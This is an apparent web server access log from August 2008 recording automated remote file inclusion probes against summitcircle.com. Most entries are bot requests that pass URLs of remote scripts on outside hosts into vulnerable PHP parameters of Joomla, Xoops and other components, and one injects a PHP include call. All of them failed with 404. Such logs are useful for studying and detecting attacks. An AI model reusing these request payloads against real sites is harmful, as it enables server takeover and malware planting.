202.84.119.204 - - [10/Aug/2008:19:03:54 -0700] "GET /logs/access_071015.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.84.119.204 - - [10/Aug/2008:19:03:54 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.84.119.204 - - [10/Aug/2008:19:03:58 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.39.5.203 - - [10/Aug/2008:19:04:01 -0700] "GET /logs/access_080406.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:04:08 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:19:04:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:04:59 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:00 -0700] "GET /logs/access_080406.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:07 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:08 -0700] "GET /logs/access_080406.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:11 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:12 -0700] "GET /logs/access_080406.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:25 -0700] "GET /logs/access_071203.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:25 -0700] "GET /logs/access_071203.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:31 -0700] "GET /logs/access_080427.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:31 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:31 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:32 -0700] "GET /logs/access_071203.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:33 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:36 -0700] "GET /logs/access_070917.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:37 -0700] "GET /logs/access_080406.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:40 -0700] "GET /logs/access_080427.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:19:05:40 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:40 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:19:05:41 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:43 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:46 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:47 -0700] "GET /logs/access_080505.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:05:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:53 -0700] "GET /logs/access_080427.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:53 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:53 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:05:58 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:18 -0700] "GET /logs/access_071203.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:19 -0700] "GET /logs/access_080428.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:19 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:19 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:21 -0700] "GET /logs/access_080107.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:37 -0700] "GET /logs/access_071126.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:37 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:37 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:57 -0700] "GET /logs/access_071126.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:06:58 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:06:58 -0700] "GET /logs/access_071126.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:06:58 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:06:58 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:07:01 -0700] "GET /logs/access_071126.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:07:01 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.73.189.205 - - [10/Aug/2008:19:07:01 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.6.18.230 - - [10/Aug/2008:19:09:46 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:10:17 -0700] "GET /logs/access_080323.log/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:10:17 -0700] "GET /config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:10:17 -0700] "GET /logs/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:10:20 -0700] "GET /logs/access_080324.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.70.83.4 - - [10/Aug/2008:19:10:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:19:11:16 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.121.133.130 - - [10/Aug/2008:19:11:17 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
202.84.119.204 - - [10/Aug/2008:19:12:05 -0700] "GET /logs/scripts.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.9.159.178 - - [10/Aug/2008:19:12:07 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.9.159.178 - - [10/Aug/2008:19:12:11 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://lipuu.com/tool/chid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.249.32.13 - - [10/Aug/2008:19:12:59 -0700] "GET /logs/access_071126.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:19:13:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:19:13:28 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:14:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:14:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:14:24 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:14:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.summitcircle.com"
204.10.38.130 - - [10/Aug/2008:19:14:54 -0700] "GET /logs/access_071111.log/admin.php?login=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
204.10.38.130 - - [10/Aug/2008:19:14:54 -0700] "GET /admin.php?login=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
204.10.38.130 - - [10/Aug/2008:19:14:54 -0700] "GET /logs/admin.php?login=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:19:15:18 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:19:15:18 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:19:15:27 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.summitcircle.com"
194.79.75.195 - - [10/Aug/2008:19:15:27 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:15:49 -0700] "GET /logs/access_080324.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:15:54 -0700] "GET /logs/access_080414.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:16:01 -0700] "GET /logs/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:16:01 -0700] "GET /com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:16:06 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
70.85.102.100 - - [10/Aug/2008:19:16:06 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
195.5.163.212 - - [10/Aug/2008:19:16:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.49.254.139 - - [10/Aug/2008:19:16:50 -0700] "GET /logs/access_071203.log//modules/TotalCalendar/about.php?inc_dir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
83.65.7.74 - - [10/Aug/2008:19:17:05 -0700] "GET /logs/access_080120.log//include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
83.65.7.74 - - [10/Aug/2008:19:17:05 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
83.65.7.74 - - [10/Aug/2008:19:17:05 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://aprt.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:19:17:16 -0700] "GET /logs/access_080406.log/skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
66.230.197.245 - - [10/Aug/2008:19:17:16 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:17:30 -0700] "GET /logs/access_071015.log/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
67.18.151.242 - - [10/Aug/2008:19:17:31 -0700] "GET /com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
